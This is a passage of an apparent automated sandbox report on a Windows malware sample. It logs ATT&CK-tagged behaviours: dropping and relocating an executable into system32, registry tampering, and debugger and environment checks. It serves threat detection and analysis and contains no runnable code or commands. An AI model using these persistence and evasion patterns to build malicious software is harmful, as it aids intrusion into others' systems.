\"pipe\\uqyipjlp\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe.Local\\\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\6E13A1DCC528E5E5AD63A82C4B5054B94D4A95BBF357879A98EFFA32894931AB.EXE.LOCAL\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\mpvpepag.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"mpvpepag.exe.67EE4A69.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"mpvpepag.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\mpvpepag.exe]- [targetUID: 00000000-00005780]\n \"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: N/A]\n \"DISMHOST.EXE.67EE5469.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CMF\\CONFIG\"; Key: \"SYSTEM\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"DISABLE\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"SOURCEPATH\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"DEVICEPATH\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"ATTRIBUTES\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"CALLFORATTRIBUTES\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\mpvpepag.exe\" to \"%WINDIR%\\system32\\cygqxrtx\\mpvpepag.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00004380-00000105-248887 [PID: 4380]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004380-00000105-734863 [PID: 4380]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004380-00000105-1655458 [PID: 4380]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004380-00000105-1863960 [PID: 4380]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004380-00000105-2285104 [PID: 4380]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004380-00000105-2494343 [PID: 4380]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004380-00000105-3045006 [PID: 4380]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00002572-00000105-198227 [PID: 2572]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6EEE0000\n \"mpvpepag.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6EEE0000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6EEE0000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00004380-00000105-5213095", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" queries volume information of \"C:\\\" at 00000000-00005780-0000010C-1207559\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" queries volume information of \"C:\\\" at 00000000-00005780-0000010C-1208824\n \"mpvpepag.exe\" queries volume information of \"C:\\\" at 00000000-00004252-0000010C-1807657\n \"mpvpepag.exe\" queries volume information of \"C:\\\" at 00000000-00004252-0000010C-1808971\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002572-0000010C-147977\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002572-0000010C-784761\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002572-0000010C-1459779\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002572-0000010C-1461371", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5cce774379e675ffffffff0c0000004c62ce771f79e675ffffffff0c00000064ec120004000000000400000100000078ec12000a0e2f0000000000 (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031006a0600000088ea9c77ecf91200b344b16a88000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b400047d156aebcf51200616b400088000000f822410081a89c77ecf9120000009001006eae00000200000800000009335d00 (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb7577701f25000070fd7f9a5cd07700e0fd7fb0c967014470fd7f00000000400000003f000000250000000070fd7fa4c96701c15cd0776082d777250000000070fd7f9a5cd07700e0fd7fc8c967015789cf778083d7771317e775d8eb7577 (UID: 00000000-00005780)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000068ac42000cf83b00145ccf77435ccf77d8f83b000100000094014000010000008cf73b00935cd0774083d777d4a0cf77f5cde377d8f83b00010000000100000060e84200000000005cf73b008cf73b00f8f73b0095e1cb77813e1700feffffffd4a0cf771bbee6750000a67700000000 (UID: 00000000-00004136)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000b8de3e0010f56200145ccf77435ccf77dcf562000100000094013c000100000090f46200935cd0774083d777d4a0cf77a2bdba77dcf56200010000000100000048e43e000000000060f4620090f46200fcf4620095e1cb77ca4d1700feffffffd4a0cf771bbee6750000a67700000000 (UID: 00000000-00006040)\n \"mpvpepag.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000060dc64003cfc2400145ccf77435ccf7708fd2400010000009401620001000000bcfb2400935cd0774083d777d4a0cf772fb7fc7708fd2400010000000100000008ea6400000000008cfb2400bcfb240028fc240095e1cb776b481700feffffffd4a0cf771bbee6750000a67700000000 (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5cce774379e675ffffffff0c0000004c62ce771f79e675ffffffff0c00000064ec120004000000000400000100000078ec12000a0e150000000000 (UID: 00000000-00004252)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" queries volume information of \"C:\\\" at 00000000-00005780-0000010C-1207559\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" queries volume information of \"C:\\\" at 00000000-00005780-0000010C-1208824\n \"mpvpepag.exe\" queries volume information of \"C:\\\" at 00000000-00004252-0000010C-1807657\n \"mpvpepag.exe\" queries volume information of \"C:\\\" at 00000000-00004252-0000010C-1808971\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002572-0000010C-147977\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002572-0000010C-784761\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002572-0000010C-1459779\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002572-0000010C-1461371", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00002572)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e6300fce2120080f4a276000063000000000089f4a276864676ae0200000070e312006ce3120064e2120068e2120018e4120095e1cb779e0c1700c0e21200c83aac7634e31200d58ca47670e3120004e3120042a4a276a802ac7644e31200d2f4a276080000006ef5a27644f5a2763e4776ae0200000070aaee6e0000130026bbee6e18e31200020000000000130070aaee6e48e3120042a4a276a802ac768ce3120010a9ee6e08000000e6a8ee6e5541b4ae0200000070aaee6e0000130026bbee6eac0e6300780e630058e312008050fa6e18e41200f9f2f26e310a48c0 (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000006aa08d210300000044e56701a7c023af741700008ce56701c0e46701590000000300000048e4670150e4670118e66701d0bbb26a93b4f0c4feffffff98e56701bfe5b16a6aa08d2198e56701cce5b16a060000000000e16a01000000dfe5b16a3333ff040600000003000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e56701000000008e00000044e66701feffffffcce56701cf00d077d600d07742f5bf768e0000004700000044e6670100000000a0e567010000000008e66701 (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600de2b0cae44de67016d822276bc73260004010000 (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000650035006100640036003300610038003200630034006200350030003500340062003900340064003400610039003500620062006600330035003700380037003900610039003800650066006600610033003200380039003400390033003100610062002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bcf777ed8bf76d8eb7577ac011d0000001d0000000000000000000400e800c9000000000000000000000000000000000000000500e300c9000000000000000000000008701d0000000000200000000000000000000000 (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001d0088d82700000000003e00003e340000c0b0da270028ee2700a80a2500f001000000001d000400000088d82700acee67010464cf7738011d00e063cf7722febf760000000000001d0090d827006dd19c77ef8423af6cae08760000000000000000f401000028ee2700d82f1d000100000000001d0050011d000c00000090d82700d82f1d0002000002180000003822001a820000000000000000000000030000004cee6701820000007f070000000000003822001a02000000c075a47728ee270000000000c075a47768ee6701e8301d0000000000d82f1d00c0ee6701ff2bcf77 (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000003f6e3f710300000044e56701a7c023af001700008ce56701c0e467015b0000000300000048e4670150e4670118e66701d0bbb26a93b4f0c4feffffff98e56701bfe5b16a3f6e3f7198e56701cce5b16a820500000000e16a01000000dfe5b16a3333ff048205000004000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001d0028012800000000004b00004b340000c05003280078d22700000c24005802000000001d000080000028012800acee67010464cf7738011d00e063cf7722febf760000000000001d00300128006dd19c77ef8423af6cae08760000000000000000fc00000078d22700d82f1d000100000000001d0050011d000c00000030012800d82f1d000200000218000000c30000c38f0000000000000000000000030000004cee67018f0000004300000000000000c42f00eb0f000000c075a477c891280000000000c075a47768ee670104301d0000000000d82f1d00c0ee6701ff2bcf77 (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000014972d730300000044e56701a7c023afc41000008ce56701c0e467015b0000000300000048e4670150e4670118e66701d0bbb26a93b4f0c4feffffff98e56701bfe5b16a14972d7398e56701cce5b16a820500000000e16a01000000dfe5b16a3333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005780)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"IsWow64Process\" with parameter \"5780\" - (UID: 00000000-00005780)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": 